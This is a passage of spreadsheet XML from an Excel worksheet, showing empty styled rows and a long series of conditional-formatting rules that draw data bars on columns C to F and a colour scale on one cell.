    <row r="409" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A409" s="13"/>
      <c r="B409" s="13"/>
      <c r="C409" s="14"/>
      <c r="D409" s="14"/>
      <c r="E409" s="14"/>
      <c r="F409" s="15"/>
    </row>
    <row r="410" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A410" s="13"/>
      <c r="B410" s="13"/>
      <c r="C410" s="14"/>
      <c r="D410" s="14"/>
      <c r="E410" s="14"/>
      <c r="F410" s="15"/>
    </row>
    <row r="411" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A411" s="13"/>
      <c r="B411" s="13"/>
      <c r="C411" s="14"/>
      <c r="D411" s="14"/>
      <c r="E411" s="14"/>
      <c r="F411" s="15"/>
    </row>
    <row r="412" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A412" s="13"/>
      <c r="B412" s="13"/>
      <c r="C412" s="14"/>
      <c r="D412" s="14"/>
      <c r="E412" s="14"/>
      <c r="F412" s="15"/>
    </row>
    <row r="413" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A413" s="13"/>
      <c r="B413" s="13"/>
      <c r="C413" s="14"/>
      <c r="D413" s="14"/>
      <c r="E413" s="14"/>
      <c r="F413" s="15"/>
    </row>
    <row r="414" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A414" s="13"/>
      <c r="B414" s="13"/>
      <c r="C414" s="14"/>
      <c r="D414" s="14"/>
      <c r="E414" s="14"/>
      <c r="F414" s="15"/>
    </row>
    <row r="415" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A415" s="13"/>
      <c r="B415" s="13"/>
      <c r="C415" s="14"/>
      <c r="D415" s="14"/>
      <c r="E415" s="14"/>
      <c r="F415" s="15"/>
    </row>
    <row r="416" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A416" s="13"/>
      <c r="B416" s="13"/>
      <c r="C416" s="14"/>
      <c r="D416" s="14"/>
      <c r="E416" s="14"/>
      <c r="F416" s="15"/>
    </row>
    <row r="417" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A417" s="13"/>
      <c r="B417" s="13"/>
      <c r="C417" s="14"/>
      <c r="D417" s="14"/>
      <c r="E417" s="14"/>
      <c r="F417" s="15"/>
    </row>
    <row r="418" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A418" s="13"/>
      <c r="B418" s="13"/>
      <c r="C418" s="14"/>
      <c r="D418" s="14"/>
      <c r="E418" s="14"/>
      <c r="F418" s="15"/>
    </row>
    <row r="419" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A419" s="13"/>
      <c r="B419" s="13"/>
      <c r="C419" s="14"/>
      <c r="D419" s="14"/>
      <c r="E419" s="14"/>
      <c r="F419" s="15"/>
    </row>
    <row r="420" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A420" s="13"/>
      <c r="B420" s="13"/>
      <c r="C420" s="14"/>
      <c r="D420" s="14"/>
      <c r="E420" s="14"/>
      <c r="F420" s="15"/>
    </row>
    <row r="421" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A421" s="13"/>
      <c r="B421" s="13"/>
      <c r="C421" s="14"/>
      <c r="D421" s="14"/>
      <c r="E421" s="14"/>
      <c r="F421" s="15"/>
    </row>
    <row r="422" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A422" s="13"/>
      <c r="B422" s="13"/>
      <c r="C422" s="14"/>
      <c r="D422" s="14"/>
      <c r="E422" s="14"/>
      <c r="F422" s="15"/>
    </row>
    <row r="423" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A423" s="13"/>
      <c r="B423" s="13"/>
      <c r="C423" s="14"/>
      <c r="D423" s="14"/>
      <c r="E423" s="14"/>
      <c r="F423" s="15"/>
    </row>
    <row r="424" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A424" s="13"/>
      <c r="B424" s="13"/>
      <c r="C424" s="14"/>
      <c r="D424" s="14"/>
      <c r="E424" s="14"/>
      <c r="F424" s="15"/>
    </row>
    <row r="425" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A425" s="13"/>
      <c r="B425" s="13"/>
      <c r="C425" s="14"/>
      <c r="D425" s="14"/>
      <c r="E425" s="14"/>
      <c r="F425" s="15"/>
    </row>
    <row r="426" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A426" s="13"/>
      <c r="B426" s="13"/>
      <c r="C426" s="14"/>
      <c r="D426" s="14"/>
      <c r="E426" s="14"/>
      <c r="F426" s="15"/>
    </row>
    <row r="427" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A427" s="13"/>
      <c r="B427" s="13"/>
      <c r="C427" s="14"/>
      <c r="D427" s="14"/>
      <c r="E427" s="14"/>
      <c r="F427" s="15"/>
    </row>
    <row r="428" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A428" s="13"/>
      <c r="B428" s="13"/>
      <c r="C428" s="14"/>
      <c r="D428" s="14"/>
      <c r="E428" s="14"/>
      <c r="F428" s="15"/>
    </row>
    <row r="429" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A429" s="13"/>
      <c r="B429" s="13"/>
      <c r="C429" s="14"/>
      <c r="D429" s="14"/>
      <c r="E429" s="14"/>
      <c r="F429" s="15"/>
    </row>
    <row r="430" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A430" s="13"/>
      <c r="B430" s="13"/>
      <c r="C430" s="14"/>
      <c r="D430" s="14"/>
      <c r="E430" s="14"/>
      <c r="F430" s="15"/>
    </row>
    <row r="431" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A431" s="13"/>
      <c r="B431" s="13"/>
      <c r="C431" s="14"/>
      <c r="D431" s="14"/>
      <c r="E431" s="14"/>
      <c r="F431" s="15"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="F116:F162 F2:F30 F46:F80 F33:F44">
    <cfRule type="dataBar" priority="35">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{01917242-52DD-4328-B524-26DACB7DE176}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I8">
    <cfRule type="colorScale" priority="40">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percent" val="50"/>
        <cfvo type="max"/>
        <color rgb="FFF8696B"/>
        <color rgb="FFFFEB84"/>
        <color rgb="FF63BE7B"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C90:E91 C57:E80 C2:E30 C46:E55 C33:E44 C116:E1048576">
    <cfRule type="dataBar" priority="34">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{276D75FF-118B-4788-B4FB-FECA7CF22A9E}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C81:E89">
    <cfRule type="dataBar" priority="32">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{2AD8B511-40B1-4012-A435-3FA43E60A5BD}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F81:F91">
    <cfRule type="dataBar" priority="31">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{7FD54C1D-0B1A-4C29-B3EB-C55A871A06C6}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F45">
    <cfRule type="dataBar" priority="30">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{018475BF-FA23-43F0-942D-EFE17B4F860E}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C45:E45">
    <cfRule type="dataBar" priority="29">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{E093D6E3-AE13-42C0-88B6-DCB57717E563}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F31">
    <cfRule type="dataBar" priority="28">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{F5DA5838-4876-4F08-AADD-6EE614369892}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C31:E31">
    <cfRule type="dataBar" priority="27">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{BCE88D15-F5F1-4FE8-8BB6-1DA3B9C9D36C}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F32">
    <cfRule type="dataBar" priority="26">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{0BE00D61-14E5-4B38-A757-C3DF60668A50}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C32:E32">
    <cfRule type="dataBar" priority="25">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{2323C704-7490-4BB5-8625-3C13399C11D8}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C92:E92">
    <cfRule type="dataBar" priority="24">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{51DC4BD7-7039-43FC-8B2C-E21CA778F180}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F92">
    <cfRule type="dataBar" priority="23">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{54D717AA-8818-4B02-8C83-00BEF7294B3A}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C93:E93">
    <cfRule type="dataBar" priority="22">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{C9DBA87F-6B7E-4E55-8409-2C566705AEF8}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F93">
    <cfRule type="dataBar" priority="21">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{ADA371F9-3533-44E9-8A10-A5BBF314EA61}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C94:E94">
    <cfRule type="dataBar" priority="20">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{2ACF10F8-C5C5-4FDC-BEE2-1BDFD1A91B07}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F94">
    <cfRule type="dataBar" priority="19">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{E878D11A-B256-4591-9632-B2BB7A46FCBF}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C95:E95">
    <cfRule type="dataBar" priority="18">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{FCDC9171-7D8E-4699-A31D-E46438211B49}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F95">
    <cfRule type="dataBar" priority="17">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{86B9D43D-787D-4ED5-BB86-43FC1CED62B5}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C96:E96">
    <cfRule type="dataBar" priority="16">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{0BABE90C-9E31-42D4-A83F-9FBF987905CE}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F96">
    <cfRule type="dataBar" priority="15">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{29AF288C-7497-4E50-A90D-702064551817}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C97:E97">
    <cfRule type="dataBar" priority="14">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{05810F08-D696-43C8-8E7F-7AAFD7820A79}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F97">
    <cfRule type="dataBar" priority="13">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{1046C76A-5CCE-4BA0-BA72-1E32A5404BE4}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C98:E98">
    <cfRule type="dataBar" priority="12">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{9E703173-FD1C-49D1-B1D3-E84ADB379664}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F98">
    <cfRule type="dataBar" priority="11">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{11B547AC-954F-4B03-B1C5-4868980407EF}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C99:E99">
    <cfRule type="dataBar" priority="10">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{D1CF6177-62EF-4388-9E1E-F665E2625163}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F99">
    <cfRule type="dataBar" priority="9">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{43C68606-AF7C-4819-8129-31FA2073F874}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C100:E100">
    <cfRule type="dataBar" priority="8">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{5EECF62D-61BE-4B44-9F5D-351D2652E97E}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F100">
    <cfRule type="dataBar" priority="7">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{71C4A432-AF4B-476D-BD50-ADF6A1555951}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C101:E101">
    <cfRule type="dataBar" priority="6">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{1ABB6B78-DF6F-4CFE-867F-FBE36CDAA92A}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F101">
    <cfRule type="dataBar" priority="5">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{9DDEDC39-4DC5-4B93-838C-97AA16A4FE71}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C102:E102">
    <cfRule type="dataBar" priority="4">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{CDA1D47B-B38D-4A16-9829-B6D0422F3EC5}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F102">
    <cfRule type="dataBar" priority="3">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{7AE861F1-CC0A-4C4C-A23B-12DDE14AC3C4}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C103:E115">
    <cfRule type="dataBar" priority="2">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{C0564927-435D-4431-84E3-EE29454E3E39}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F103:F115">
    <cfRule type="dataBar" priority="1">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{C0337D63-46A3-4DD3-8CD2-36FDFD19FCC0}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>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1917242-52DD-4328-B524-26DACB7DE176}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F116:F162 F2:F30 F46:F80 F33:F44</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{276D75FF-118B-4788-B4FB-FECA7CF22A9E}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C90:E91 C57:E80 C2:E30 C46:E55 C33:E44 C116:E1048576</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{2AD8B511-40B1-4012-A435-3FA43E60A5BD}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C81:E89</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{7FD54C1D-0B1A-4C29-B3EB-C55A871A06C6}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F81:F91</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{018475BF-FA23-43F0-942D-EFE17B4F860E}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F45</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{E093D6E3-AE13-42C0-88B6-DCB57717E563}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C45:E45</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{F5DA5838-4876-4F08-AADD-6EE614369892}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F31</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{BCE88D15-F5F1-4FE8-8BB6-1DA3B9C9D36C}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C31:E31</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{0BE00D61-14E5-4B38-A757-C3DF60668A50}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F32</xm:sqref>
        </x14:conditionalFormatting>
